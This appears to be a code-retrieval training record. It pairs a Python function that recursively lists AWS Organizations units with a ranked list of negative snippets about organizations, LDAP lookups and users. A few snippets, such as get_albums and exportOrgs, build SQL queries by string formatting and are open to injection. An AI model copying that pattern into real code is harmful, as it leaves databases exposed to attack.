def get_child_ous(logger, org_client, org_unit): logger.debug("Getting OUs for: %s", org_unit) result = [org_unit] # for this OU, get all the children... args = dict(ParentId=org_unit["Id"]) children = utils.generic_paginator(logger, org_client.list_organizational_units_for_parent, "OrganizationalUnits", **args) # update child paths and then call ourselves recursively to find all children for child in children: child["Path"] = "{}/{}".format(org_unit["Path"], child["Name"]).replace("//", "/") result.extend(get_child_ous(logger, org_client, child)) return result
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_accounts_for_ou(logger, options, org_client, path):\n logger.debug(\"Getting accounts for OU: %s\", path)\n org_unit = get_ou_from_path(logger, org_client, path)\n ous = []\n if options.no_recursive:\n ous.append(org_unit)\n else:\n ous.extend(get_child_ous(logger, org_client, org_unit))\n\n result = []\n for org_unit in ous:\n args = {\"ParentId\":org_unit[\"Id\"]}\n accounts = utils.generic_paginator(logger, org_client.list_accounts_for_parent,\n \"Accounts\", **args)\n for acc in accounts:\n acc[\"Path\"] = org_unit[\"Path\"]\n if 'Status' in acc:\n if acc['Status'] != 'SUSPENDED':\n result.append(acc)\n else:\n logger.info(\"found suspended account %s, ignoring it.\" % acc)\n return result", "def list_ou(self, _):\n cn_re = re_compile(\"{[^}]+}\")\n results = self.engine.query(self.engine.GPO_INFO_FILTER(), [\"cn\", \"displayName\"])\n gpos = {}\n for gpo in results:\n gpos[gpo[\"cn\"]] = gpo[\"displayName\"]\n\n results = self.engine.query(self.engine.OU_FILTER())\n for result in results:\n print(result[\"distinguishedName\"])\n if \"gPLink\" in result:\n guids = cn_re.findall(result[\"gPLink\"])\n if len(guids) > 0:\n print(\"[gPLink]\")\n print(\"* {}\".format(\"\\n* \".join([gpos[g] if g in gpos else g for g in guids])))", "def _get_ou_ids(self, org):\n\n # get root id\n root_id = self._get_root_id(org)\n\n # get OUs under the Org root\n ou_list_at_root_level = self._list_ou_for_parent(org, root_id)\n\n _ou_name_to_id_map = {}\n _all_ou_ids = []\n\n for ou_at_root_level in ou_list_at_root_level:\n # build list of all the OU IDs under Org root\n _all_ou_ids.append(ou_at_root_level.get('Id'))\n # build a list of ou id\n _ou_name_to_id_map.update(\n {ou_at_root_level.get('Name'): ou_at_root_level.get('Id')}\n )\n\n self.logger.info(\"Print OU Name to OU ID Map\")\n self.logger.info(_ou_name_to_id_map)\n\n return _all_ou_ids, _ou_name_to_id_map", "def list_all_organizations(ctx):\n pprint(ctx.obj.orgs.get().data)", "async def get_organizations(request: Request):\n redis = request.app.state.redis\n organizations_obj = orjson.loads(await redis.get_key(\"influxdb_organizations\"))\n return [org for org in organizations_obj]", "def createOuInLDAP(ldir, ou):\n\n dn = 'ou=%s,%s' % (ou, ldir.ldap_base_creation)\n attrs = {'objectClass': ['top', 'organizationalUnit'],\n 'ou': ou}\n ldir.insertLDAP(dn, attrs)", "def list_orgs(self):\n orgs = list(self.orgs.keys())\n orgs.sort()\n return orgs", "def test_retrieve_l_organizations(self):\n pass", "def organizations(self):\n return self.get('{}/orgs'.format(ApiVersion.A1.value))", "def getAllRooms(z, opts):\n params = {}\n dmerge(params, parse_param('@attrs=uid'))\n dmerge(params, parse_param('@types=resources'))\n #dmerge(params, parse_param('@limit=5'))\n response = z.request('SearchDirectoryRequest', params=params, opts=opts)\n names = [item['name'] for item in response['SearchDirectoryResponse']['calresource']]\n return names", "def get_ou_from_path(logger, org_client, path):\n logger.debug(\"Getting OU from path: %s\", path)\n\n current_ou = org_client.list_roots()[\"Roots\"][0][\"Id\"]\n if path == \"/\":\n return {\"Id\":current_ou, \"Path\":path}\n\n for dir_name in path.split(\"/\")[1:]:\n logger.debug(\"Getting OU from path: %s, looking for: %s\", path, dir_name)\n found = False\n args = dict(ParentId=current_ou)\n children = utils.generic_paginator(logger, org_client.list_organizational_units_for_parent,\n \"OrganizationalUnits\", **args)\n\n for org_unit in children:\n if org_unit[\"Name\"] == dir_name:\n current_ou = org_unit[\"Id\"]\n found = True\n break\n\n if not found:\n raise ValueError(\"OU path not found\")\n\n return {\"Id\":current_ou, \"Path\":path}", "def get_ldap_users(conn, searchfilter, attrs):\n\n base_dn = conn.server.info.other['DefaultNamingContext'][0]\n conn.search(search_base=base_dn, search_filter=searchfilter, attributes=attrs)\n return conn.entries", "def organizations(self):\n self.elements('organizations')", "def organizations_at_location(self, location):\n if location is None:\n queryset = self.filter(location=None)\n elif location.region is None:\n queryset = self.filter(Q(location=None) | Q(location=location))\n elif location.tik is None:\n queryset = self.filter(Q(location=None) | Q(location__id__in=[location.region_id, location.id]))\n else:\n queryset = self.filter(Q(location=None) | Q(location__id__in=[location.tik_id, location.region_id, location.id]))\n\n organization_ids = set(queryset.values_list('organization_id', flat=True))\n\n organizations = Organization.objects.filter(id__in=organization_ids).order_by('title')\n\n for representative in OrganizationRepresentative.objects.filter(organization__in=organization_ids):\n organization = (filter(lambda org: org.id==representative.organization_id, organizations) or [None])[0]\n if organization:\n organization.representative = True\n\n return organizations", "def get_orgs():\n \n url = \"https://api.github.com/user/orgs\"\n \n org_urls = []\n orgs = utils.get_json(url)\n \n for org in orgs:\n org_urls.append(org[\"url\"])\n \n return org_urls", "def all_organizations(\n self,\n page: int | None = None,\n per_page: int | None = None,\n include_totals: bool = True,\n from_param: str | None = None,\n take: int | None = None,\n ):\n\n params = {\n \"page\": page,\n \"per_page\": per_page,\n \"include_totals\": str(include_totals).lower(),\n \"from\": from_param,\n \"take\": take,\n }\n\n return self.client.get(self._url(), params=params)", "def test_getorgs(self):\n pass", "def getUsersByOrganisation(SID, organisation_id, start, max, orderby, asc):\n return call(\"getUsersByOrganisation\", SID, organisation_id, start, max, orderby, asc)", "def atlas_organizations():\n pass", "def get_owner_entities(self, username):\n\t\t#print('Quasar Utility Server getting owner entities for username{' + username + '}')\n\t\treturn self._send_command_to_entity_server(us.SERVER_COMMAND_GET_OWNER_ENTITIES, username)", "def test_organizations_list(self):\n pass", "def organizations_owned(self):\n return sorted(set([team.org for team in self.teams if team.org.owners == team]),\n key=lambda o: o.title)", "def orca_list():\n val = []\n val.append('orca')\n val.append('orca-b3lyp')\n return val", "def offices_ldap():\n conn = Connection(\"ldap.laas.fr\", auto_bind=True)\n conn.search(\n \"dc=laas,dc=fr\",\n \"(laas-mainGroup=gepetto)\",\n attributes=[\"sn\", \"givenName\", \"roomNumber\", \"st\"],\n )\n offices = Offices()\n for entry in conn.entries:\n room, gn, sn, st = (\n str(entry.roomNumber),\n str(entry.givenName),\n str(entry.sn),\n str(entry.st),\n )\n if (\n st not in [\"JAMAIS\", \"NON-PERTINENT\"]\n and date(*(int(i) for i in reversed(st.split(\"/\")))) < date.today()\n ):\n continue # filter out alumni\n if room == \"[]\":\n continue # filter out the Sans-Bureaux-Fixes\n offices[room].add(Gepettist(sn, gn))\n return offices", "def test_get_all_for_organization(self):\n org = Organization.create(name='foo', program_id=self.program.uid)\n org.put()\n user = User.create(name='foo', email='foo@bar.com',\n owned_organizations=[org.uid])\n user.put()\n response = self.testapp.get(\n '/api/organizations/{}/users'.format(org.uid),\n headers=self.login_headers(user),\n )\n response_list = json.loads(response.body)\n self.assertEqual(len(response_list), 1)", "def create_ou(self, dn, name, description):\n attrs = {'objectclass': ['top', 'organizationalUnit'], 'ou': name, 'description': description}\n self.add_entry(dn, attrs)", "def computeMailboxOu(portal, title):\n\n catalog = portal.portal_catalog\n\n current = cleaned = toAscii(title).lower()\n i = 1\n existing = True\n while existing:\n existing = catalog(ou=current)\n if not existing:\n break\n current = '%s_%d' % (cleaned, i)\n i += 1\n dtool = getToolByName(portal, 'portal_directories', None)\n if dtool is not None: # not in unit tests\n ldir = getattr(dtool, 'local_addressbook_ldap', None)\n if ldir is not None:\n createOuInLDAP(ldir, current)\n return current", "def myorgs(request):\n context = RequestContext(request)\n \n user = request.user\n orgs = user.orgusers.get_query_set()\n \n context['orgs'] = orgs\n return render_to_response('myorgs.html', context)", "def list_by_owner(owner_name):\n # TODO: move to search\n owner = account.find(owner_name)\n return Resource.query.join(Resource.owner).filter(Account.name==owner.name)", "def list_all():\n\n members = ldapi.search(ld, cfg['ldap_users_base'], '(objectClass=member)')\n return dict([(member[0], member[1]) for member in members])", "def get_all_orgs():\r\n org_filter_set = set()\r\n if not has_configuration_set():\r\n return org_filter_set\r\n\r\n for value in settings.MICROSITE_CONFIGURATION.values():\r\n org_filter = value.get('course_org_filter')\r\n if org_filter:\r\n org_filter_set.add(org_filter)\r\n\r\n return org_filter_set", "def get_all_national_university():\n f_name = 'national_university_info.json'\n\n data_list = load_cache(f_name, data_type='list')\n if len(data_list) == 0:\n print('Request National University Info through Website...')\n for page in range(1, 17):\n data_list += get_national_university_page(page)\n save_cache(data_list, f_name)\n else:\n print('Get National University Info from Cache File...')\n\n nu_obj_list = [NationalUniversity(data_dict=data_dict) for data_dict in data_list]\n return nu_obj_list", "def get_all_users():", "def get_all_companies_and_people():", "def fetch_owner_accounts():\n resp = oauth.tapkey.get('Owners')\n owner_accounts = resp.json()\n return owner_accounts", "def allCountriesAndTowns():\n countryWoeids = [c.woeid for c in db.Country.select()]\n townWoeids = [t.woeid for t in db.Town.select()]\n woeidList = countryWoeids + townWoeids\n\n return woeidList", "async def scan_UTXOs(sochain_url, network, address):\n utxos = await sochain_api.get_unspent_txs(sochain_url, network, address)\n utxos = list(map(sochain_utxo_to_xchain_utxo, utxos))\n return utxos", "def ls():\n return dynamodb.ls(OrganizationModel)", "async def All_orgs():\n\n links_13 = []\n links_14 = []\n valid_url = \"/?archive/?gsoc/\\d+[0-9]/orgs/[a-zA-Z]+\"\n for year in range(2009, 2016):\n year_url = melange + \"/archive/gsoc/{}\".format(year)\n soup = await get_page(year_url)\n\n for url in soup.find_all('a'):\n if re.match(valid_url, url.get(\"href\")):\n if year <= 2013:\n links_13.append(join(melange, url.get(\"href\")[1:]))\n else:\n links_14.append(join(melange, url.get(\"href\")[1:]))\n return links_13, links_14", "def listOrganizations(self, name='', type=''):\n return self.get_json('/organization', {'name': name, 'type': type})", "def get_owned_databases(cursor: Cursor, owner: Owner) -> List[str]:\n try:\n role = pgsql.get_role(cursor, owner_name(owner))\n except KeyError:\n return []\n else:\n return pgsql.get_role_databases(cursor, role)", "def get_objects_owners(obj):\n type = obj.get_type()\n owners = []\n for user in obj.user_set.all():\n if type == Entities.TASK:\n relation = UserTasks.objects.get(user=user, task=obj)\n elif type == Entities.EVENT:\n relation = UserEvents.objects.get(user=user, event=obj)\n elif type == Entities.PLAN:\n relation = UserPlans.objects.get(user=user, plan=obj)\n else:\n raise TypeError\n owners.append(Owner(user.name, relation.access_level))\n\n return owners", "def get_org_admins(self, dataset: Dict) -> List[User]:\n organization_id = dataset[\"organization_id\"]\n orgadmins = list()\n organization = self.organizations[organization_id]\n if \"admin\" in organization:\n for userid in self.organizations[organization_id][\"admin\"]:\n user = self.users.get(userid)\n if user:\n orgadmins.append(user)\n return orgadmins", "def list(self) -> List[Organisation]:\n ...", "def create_test_ou(samdb, name):\n\n # Add some randomness to the test OU. Replication between the testenvs is\n # constantly happening in the background. Deletion of the last test's\n # objects can be slow to replicate out. So the OU created by a previous\n # testenv may still exist at the point that tests start on another testenv.\n rand = randint(1, 10000000)\n dn = ldb.Dn(samdb, \"OU=%s%d,%s\" % (name, rand, samdb.get_default_basedn()))\n samdb.add({\"dn\": dn, \"objectclass\": \"organizationalUnit\"})\n return dn", "def list_sub(location=''):\n if location != '':\n pathloc = os.path.join(os.getcwd(), location)\n else:\n pathloc = os.getcwd()\n\n print(pathloc)\n\n directory_contents = os.listdir(pathloc)\n sub_directories = []\n for item in directory_contents:\n # list directories\n if os.path.isdir(os.path.join(pathloc, item)):\n sub_directories.append(item)\n sub_directories.sort()\n return sub_directories", "def get_albums(entity_url: str) -> list:\n entity_url = entity_url.rstrip(\"/\")\n response = requests.get(entity_url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n albums = []\n for link in soup.find_all('a'):\n url = link.get('href')\n if url is not None and \"/album/\" in url:\n if url.startswith(\"http\"):\n albums.append(url)\n else:\n albums.append(f\"{entity_url}{url}\")\n return albums", "def get_groups(self, group_ou, group_class, domain):\n self.logger.debug(\"Retriving LDAP groups...\")\n try:\n groups_search_base = group_ou + ',' + domain\n self.logger.debug(\n \"Group search base: {0}\".format(groups_search_base)\n )\n groups = self.ldap_conn.search_s(\n groups_search_base,\n ldap.SCOPE_SUBTREE,\n \"(objectClass={0})\".format(group_class)\n )\n\n except ldap.LDAPError, e:\n self.logger.error(unicode(e.message).encode('utf-8'))\n raise PSQLAuthnzLDAPException(\n \"Failed to get groups from the specified OU.\"\n )\n except Exception as e:\n self.logger.error(unicode(e.message).encode('utf-8'))\n raise e\n\n self.logger.info(\n \"Retrieved {0} group(s) to synchronize...\".format(\n len(groups)\n )\n )\n\n for group in groups:\n self.logger.debug(\"Found group: {0}\".format(group[0]))\n\n return groups", "def get_albums_by_artist(albumtype, search_for, sort_on):\n return list(dmla.list_albums_by_artist(albumtype, search_for, sort_on))", "def test_retrieve_l_organization_locations(self):\n pass", "def find_own_objects(cs):\n own_objects = {}\n for con in cs:\n own_objects[con] = []\n for obj in con.extent:\n own_objects[con].append(obj)\n for sub_con in cs:\n if sub_con.extent < con.extent and\\\n obj in sub_con.extent:\n own_objects[con].pop()\n break\n return own_objects", "def search_ldap(l, filter, base, scope=ldap.SCOPE_SUBTREE, attributes=None, accountname=None, DEBUG=False):\r\n if '%s' in filter:\r\n query = filter % accountname\r\n else:\r\n query = filter\r\n if DEBUG:\r\n warning(\"searching for user '%s' in base: %s. retrieve attributes: %s, scope: %s\"%(accountname, base, attributes, scope))\r\n warning('Filter string: %s'%(query,))\r\n try:\r\n ldap_result_id = l.search(base, scope, query, attributes)\r\n if DEBUG:\r\n warning('ldap_result_id: %s'%ldap_result_id)\r\n result_set = llist()\r\n result_type, result_data = l.result(ldap_result_id, 0)\r\n if DEBUG:\r\n warning('len of result_data: %d'%len(result_data))\r\n while result_type == ldap.RES_SEARCH_ENTRY:\r\n result_data = result_data[0]\r\n #data = ( result_data[0] , { i:result_data[1][i] for i in result_data[1] } )\r\n user_data = ldict({i: result_data[1][i][0] if len(result_data[1][i])==1 else result_data[1][i] for i in result_data[1]})\r\n user_data['dn'] = result_data[0]\r\n if isinstance(user_data['dn'], list):\r\n user_data['dn'] = user_data['dn'][0]\r\n\r\n result_set.append(user_data)\r\n result_type, result_data = l.result(ldap_result_id, 0)\r\n if DEBUG:\r\n warning('len of result_data: %d'%len(result_data))\r\n\r\n return result_set\r\n\r\n except ldap.LDAPError, e:\r\n print e\r\n return None", "def organizations(self):\r\n return organizations.Organizations(self)", "def searchUsers(self,conds,_from,to,order_by,desc,admin_obj):\n self.__searchUsersCheckInput(conds,_from,to,order_by,desc,admin_obj)\n search_helper=user_main.getAttributeManager().runAttrSearchers(conds,admin_obj)\n return search_helper.getUserIDs(_from,to,order_by,desc)", "def owners(self):\n return self.find_users_by_rel('owner')", "def _parse_for_OU(self, event):\n rows = event.find_all(\"tr\")[:2]\n ous = []\n for row in rows:\n ou = row.find_all(\"td\", {\"class\": \"mktdesc\"})[0]\n handicap = row.find_all(\"td\", {\"class\": \"hdcp\"})[1]\n price = row.find_all(\"td\", {\"class\": \"odds\"})[2]\n ous.append(\" \".join((ou.text, handicap.text, price.text)))\n return tuple(ous)", "def test_retrieve_l_organization(self):\n pass", "def _get_userlist_by_userright(self, userright):\n params = {\n \"action\": \"query\",\n \"list\": \"allusers\",\n \"format\": \"json\",\n \"augroup\": userright,\n \"aulimit\": \"500\",\n }\n r = self.session.get(ENWIKI_API, params=params)\n data = r.json()\n return [u[\"name\"] for u in data[\"query\"][\"allusers\"]]", "def iter_units(status):\n for app_name, app in sorted(get_applications(status).items()):\n for unit_name, unit in sorted(app.get('units', {}).items()):\n yield unit_name, unit\n subordinates = unit.get('subordinates', ())\n for sub_name in sorted(subordinates):\n yield sub_name, subordinates[sub_name]", "def get_all_users(db):\n return list(db['user'].find())", "def get_university(doc = None, cursor = None):\n\tif cursor is None and doc is not None:\n\t\treturn doc['details']['university']\n\telif doc is None and cursor is not None:\n\t\tallunivs = list()\n\t\tfor thisdoc in cursor:\n\t\t\tallunivs.append(thisdoc['details']['university'])\n\t\treturn allcoms\n\telse:\n\t\tprint \"Supply any one argument only!\"", "def otuList():\n # Query all passengers\n results = session.query(Otu.otu_id,Otu.lowest_taxonomic_unit_found).all()\n\n # Create a dictionary from the row data and append to a list of all_passengers\n otus = []\n for aotu in results:\n # print(aotu.otu_id)\n otu_dict = {}\n # otu_dict[\"ID\"] = aotu.otu_id\n otu_dict[\"Lowest\"] = aotu.lowest_taxonomic_unit_found\n otus.append(otu_dict)\n return jsonify(otus)", "def search_ocio(rule: str):\n ocio_path = get_ocio_path()\n with open(ocio_path, mode='r') as f:\n config = f.read()\n list = re.findall(rule, config)\n\n return list", "def obtener_por_uo(unidad_organica_id):\n db = current.db\n q = (db.departamento.id > 0)\n q &= (db.departamento.unidad_organica_id == unidad_organica_id)\n return db(q).select(db.departamento.ALL,\n orderby=db.departamento.nombre)", "def organization_list(request):\n return [o.slug for o in Organization.objects.all()]", "def get_org_list():\r\n\r\n resp = requests.get(''.join([Kegg.BASE_URL, 'list/organism']))\r\n return resp.text", "def find_all_ORFs(dna):\n \n # YOUR IMPLEMENTATION HERE", "def organizations(self):\n return sorted(set([team.org for team in self.teams]), key=lambda o: o.title)", "def _createOrganizationsCollections(folder):\n collections = [\n {'id': 'all_orgs', 'tit': _('all_orgs'), 'subj': (u'search', ), 'query': [\n {'i': 'portal_type',\n 'o': 'plone.app.querystring.operation.selection.is',\n 'v': ['organization']}],\n 'cond': u\"\", 'bypass': [],\n 'flds': (u'select_row', u'org_pretty_link_with_additional_infos',\n u'SelectedInPlonegroupColumn', u'PloneGroupUsersGroupsColumn',\n u'review_state', u'CreationDate', u'actions'),\n 'sort': u'sortable_title', 'rev': False, 'count': False},\n ]\n _createDashboardCollections(folder, collections)", "def create_ou(self, ou_dn, description=None, name=None, sd=None):\n m = {\"dn\": ou_dn,\n \"objectClass\": \"organizationalUnit\"}\n\n if description:\n m[\"description\"] = description\n if name:\n m[\"name\"] = name\n\n if sd:\n m[\"nTSecurityDescriptor\"] = ndr_pack(sd)\n self.add(m)", "def users_organizations(user):\n if not user or not user.is_authenticated():\n return None\n else:\n return get_users_organizations(user)", "def online_users(room):\n threshold = datetime.now() - timedelta(seconds=10)\n authorizations = models.Authorization.gql(\"WHERE room = :room AND last_checked_in >= :threshold\", room=room, threshold=threshold).fetch(1000)\n return [x.user for x in authorizations]", "def _list_orgs(self, context):\r\n try:\r\n rtn = {'context': context,\r\n 'orgs': sorted(list(self._bbreader.cache[context].keys()))}\r\n except KeyError:\r\n raise RequestError('Context {} not found'.format(context))\r\n return rtn", "def get_members(organization):\n raise Exception(\"Someone needs to fix this method to no longer be dependent on model relationship if they're going to use it!\")", "def test_get_namespaces_from_accounts(self):\n pass", "def find_all_ORFs_both_strands_unit_tests():\n\n # YOUR IMPLEMENTATION HERE", "def index(owner):\n result = logic.resource.list_by_owner(owner)\n return jsonify(list(result))", "def _get_org_members(self):\n url = f\"{BASE_URL}/orgs/{ORG}/members\"\n return self.fetch_all_pages(url, flatten=True, query_params={\"per_page\": 100})", "def find_words_using_all_vowels():\n pass", "def find_user_groups(conn, ldap_domain, ldap_domain_ext, user_dn):\n try:\n search_base = \"dc={}, dc={}\".format(ldap_domain, ldap_domain_ext)\n query = \"(&(objectCategory=group)(member={}))\".format(user_dn)\n attributes = ['distinguishedName']\n\n conn.search(search_base, query, attributes=attributes)\n groups = conn.entries\n except Exception as e:\n raise Exception(\"No groups found :: {}\".format(e))\n return groups", "def get_all_items(unit) -> list:\n items = []\n for item in unit.items:\n if item.multi_item:\n for subitem in item.subitems:\n items.append(subitem)\n else:\n items.append(item)\n return items", "def get_albums(username):\n cur = mysql.connection.cursor()\n cur.execute(\"SELECT * FROM album WHERE username = '{0}'\".format(username))\n return cur.fetchall()", "def urn_coll(word, urns=[], after=5, before=5, limit=1000):\n if isinstance(urns[0], list): # urns assumed to be list of list with urn-serial as first element\n urns = [u[0] for u in urns]\n \n r = requests.post(\"https://api.nb.no/ngram/urncoll\", json={'word':word, 'urns':urns, \n 'after':after, 'before':before, 'limit':limit})\n return pd.DataFrame.from_dict(r.json(), orient='index').sort_values(by=0, ascending = False)", "def getInterestedUsers():", "def who_on_location(loc_npc, location):\r\n units = []\r\n # for y in [x for x in range(1, num) if loc_npc[x].location == location]:\r\n for y in [x for x in loc_npc if loc_npc[x].location == location]:\r\n units.append(y)\r\n return units", "def get_all_my_organizations(self, **kwargs):\n kwargs['_return_http_data_only'] = True\n if kwargs.get('callback'):\n return self.get_all_my_organizations_with_http_info(**kwargs)\n else:\n (data) = self.get_all_my_organizations_with_http_info(**kwargs)\n return data", "def woa_subset(llcrnrlon=2.5, urcrnrlon=357.5, llcrnrlat=-87.5, urcrnrlat=87.5,\n var='temperature', clim_type='monthly', resolution='1deg',\n levels=slice(0, 40)):\n\n uri = \"http://data.nodc.noaa.gov/thredds/dodsC/woa/WOA09/NetCDFdata\"\n fname = \"%s_%s_%s.nc\" % (var, clim_type, resolution)\n url = '%s/%s' % (uri, fname)\n nc = Dataset(url)\n\n v = dict(temperature='t', dissolved_oxygen='o', salinity='s',\n oxygen_saturation='O', apparent_oxygen_utilization='A',\n phosphate='p', silicate='p', nitrate='n')\n\n d = dict({'%s_an' % v[var]: 'OA Climatology',\n '%s_mn' % v[var]: 'Statistical Mean',\n '%s_dd' % v[var]: 'N. of Observations',\n '%s_se' % v[var]: 'Std Error of the Statistical Mean',\n '%s_sd' % v[var]: 'Std Deviation from Statistical Mean',\n '%s_oa' % v[var]: 'Statistical Mean minus OA Climatology',\n '%s_ma' % v[var]: 'Seasonal/Monthly minus Annual Climatology',\n '%s_gp' % v[var]: 'N. of Mean Values within Influence Radius'})\n\n depths = [0, 10, 20, 30, 50, 75, 100, 125, 150, 200, 250, 300, 400, 500,\n 600, 700, 800, 900, 1000, 1100, 1200, 1300, 1400, 1500, 1750,\n 2000, 2500, 3000, 3500, 4000, 4500, 5000, 5500, 6000, 6500, 7000,\n 7500, 8000, 8500, 9000][levels]\n\n llcrnrlon, urcrnrlon = map(wrap_lon360, (llcrnrlon, urcrnrlon))\n lon = wrap_lon360(nc.variables.pop('lon')[:])\n lat = nc.variables.pop('lat')[:]\n depth = nc.variables.pop('depth')[:]\n times = nc.variables.pop('time')\n times = num2date(times[:], times.units, calendar='365_day')\n times = [time.strftime('%b') for time in times]\n\n if clim_type == 'annual':\n times = clim_type\n\n # Select data subset.\n maskx = np.logical_and(lon >= llcrnrlon, lon <= urcrnrlon)\n masky = np.logical_and(lat >= llcrnrlat, lat <= urcrnrlat)\n maskz = np.array([z in depths for z in depth])\n\n lon, lat, depth = lon[maskx], lat[masky], depth[maskz]\n\n start = '%s_' % v[var]\n variables = dict()\n for variable in nc.variables.keys():\n if variable.startswith(start):\n subset = nc.variables[variable][..., maskz, masky, maskx]\n data = Panel4D(subset, major_axis=lat, minor_axis=lon,\n labels=np.atleast_1d(times),\n items=np.atleast_1d(depth))\n variables.update({d[variable]: data})\n return variables", "def expand_otu_ids(otu_map, otus_to_expand, ignore_missing=False):\r\n result = []\r\n for o in otus_to_expand:\r\n otu_id = o.split()[0]\r\n try:\r\n result += otu_map[otu_id]\r\n except KeyError:\r\n if ignore_missing:\r\n continue\r\n else:\r\n raise KeyError(\"OTU id not in OTU map: %s\" % o.split()[0])\r\n return result", "def organizations_owned_ids(self):\n return list(set([team.org.id for team in self.teams if team.org.owners == team]))", "def get_organizations(self, language=None):\n return self.get_direct_related_page_extensions(\n Organization, OrganizationPluginModel, language=language\n )", "def exportOrgs ( c ) :\n assert str(type(c)) == \"<type '_mysql.connection'>\"\n xml = \"\"\n o = sqlQuery ( c, \"select * from Organizations;\" )\n for i in o:\n oL = sqlQuery ( c, \"select * from OrganizationLocations where orgID = '\"+i[0]+\"';\" )\n oER = sqlQuery ( c, \"select * from OrganizationExternalResources where orgID = '\"+i[0]+\"';\" )\n oTC = sqlQuery ( c, \"select * from OrganizationsToCrises where orgID = '\"+i[0]+\"';\" )\n pTO = sqlQuery ( c, \"select * from PeopleToOrganizations where orgID = '\"+i[0]+\"';\" )\n xml += openTagAtt ( \"Organization\", \"organizationIdent\", i[0])\n xml += openCloseTag ( \"Name\", i[1])\n xml += closeTagAtt ( \"Kind\", \"organizationKindIdent\", i[2])\n for j in oL :\n xml += openTag ( \"Location\" )\n xml += openCloseTag ( \"Locality\", j [ 1 ] )\n xml += openCloseTag ( \"Region\", j [ 2 ] )\n xml += openCloseTag ( \"Country\", j [ 3 ] )\n xml += closeTag ( \"Location\" )\n xml += openCloseTag (\"History\", i[3])\n xml += openTag ( \"ContactInfo\" )\n xml += openCloseTag (\"Telephone\", i[4])\n xml += openCloseTag (\"Fax\", i[5])\n xml += openCloseTag (\"Email\", i[6])\n xml += openTag (\"PostalAddress\")\n xml += openCloseTag (\"StreetAddress\", i[7])\n xml += openCloseTag ( \"Locality\", i[8])\n xml += openCloseTag ( \"Region\", i[9])\n xml += openCloseTag ( \"PostalCode\", i[10])\n xml += openCloseTag ( \"Country\", i[11])\n xml += closeTag ( \"PostalAddress\" )\n xml += closeTag ( \"ContactInfo\" )\n xml += openTag (\"ExternalResources\")\n for j in oER:\n xml += openCloseTag ( j[1], j[2])\n xml += closeTag (\"ExternalResources\")\n xml += openTag (\"RelatedCrises\")\n for j in oTC:\n xml += closeTagAtt (\"RelatedCrisis\", \"crisisIdent\", j[1])\n xml += closeTag (\"RelatedCrises\")\n xml += openTag (\"RelatedPersons\")\n for j in pTO:\n xml += closeTagAtt (\"RelatedPerson\", \"personIdent\", j[0])\n xml += closeTag (\"RelatedPersons\")\n xml += closeTag (\"Organization\")\n assert str ( type ( xml ) ) == \"<type 'str'>\"\n return xml", "def _orgsWithLogoForQuery(query, batch_size=5):\n orgs = []\n for org in query:\n if org.logo_url:\n orgs.append(org)\n if len(orgs) == batch_size:\n break\n\n return orgs", "def get_accounts(self, session: \"Session\") -> List[Account]:\n\n self.__get_dn(session)\n\n result = session.soapclient.get_accounts_by_owner(self.dn)\n return [Account(session, account=r) for r in result]", "def organizations(self) -> pulumi.Output[Optional[Sequence[str]]]:\n return pulumi.get(self, \"organizations\")", "def get_university(doc = None, cursor = None):\n\tif cursor is None and doc is not None:\n\t\treturn doc['details']['university']\n\telif doc is None and cursor is not None:\n\t\tallunivs = list()\n\t\tfor thisdoc in cursor:\n\t\t\tallunivs.append(thisdoc['details']['university'])\n\t\treturn allunivs\n\telse:\n\t\tprint \"Supply any one argument only!\"", "def get_albums():\n return query_multiple(request.args, album_search, \\\n album_filter, Album, albums_schema)", "def test_get_namespaces_from_account(self):\n pass", "def get_own_spaces(user):\n if not user:\n return []\n own_spaces = []\n accessible_spacs = get_accessible_spaces(user)\n for space in accessible_spacs:\n group_ids = [space.get_team().id, space.get_members().id, space.get_admins().id]\n if user.groups.filter(id__in = group_ids):\n own_spaces.append(space)\n return own_spaces", "def allCountriesSomeTowns(include, quiet=True):\n assert isinstance(\n include, list\n ), \"Expected `include` as type `list`\" \"but got type `{}`.\".format(\n type(include).__name__\n )\n # Get all countries.\n woeidList = [c.woeid for c in db.Country.select()]\n\n # Lookup towns belonging to a set of countries.\n filteredCountries = db.Country.select(builder.IN(db.Country.q.name, include))\n for x in filteredCountries:\n townWoeids = [y.woeid for y in x.hasTowns]\n woeidList.extend(townWoeids)\n if not quiet:\n print(x.name)\n townNames = [y.name for y in x.hasTowns]\n print(townNames)\n print()", "def ListOrganizations(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')" ]
[ "0.6812674", "0.67796934", "0.61813617", "0.5930881", "0.58512056", "0.54681545", "0.54233587", "0.53596294", "0.52998245", "0.52364296", "0.51616734", "0.51128006", "0.50904953", "0.50900835", "0.5064042", "0.50519156", "0.50236064", "0.5009377", "0.4984651", "0.49781162", "0.490988", "0.48999056", "0.48667663", "0.4866166", "0.48606572", "0.48567817", "0.48500574", "0.48356378", "0.4827705", "0.47997653", "0.47991583", "0.47858837", "0.47819954", "0.47588882", "0.47240767", "0.47204745", "0.47130844", "0.4705507", "0.46970102", "0.46938866", "0.46725634", "0.46710804", "0.46707243", "0.46588907", "0.46540985", "0.4639043", "0.4635447", "0.46278447", "0.46232757", "0.46171996", "0.46114284", "0.46109492", "0.46089798", "0.4601541", "0.4597197", "0.45941666", "0.45939168", "0.4587934", "0.4580589", "0.45740715", "0.45690075", "0.45666808", "0.45555755", "0.45554352", "0.4553994", "0.45426506", "0.4540194", "0.45347482", "0.45260847", "0.45115322", "0.4509025", "0.4503915", "0.4500836", "0.4495855", "0.44942766", "0.44866422", "0.4484719", "0.4476957", "0.44765636", "0.44752562", "0.44714344", "0.44709224", "0.4468088", "0.44615915", "0.44554722", "0.4454393", "0.44451547", "0.4436211", "0.4435343", "0.44346058", "0.4433623", "0.44282636", "0.44271073", "0.44263002", "0.44250593", "0.44131425", "0.43966916", "0.4396017", "0.43854034", "0.43841296" ]
0.6912658
0
given a path, traverse Organizations OUs to locate the required OU...
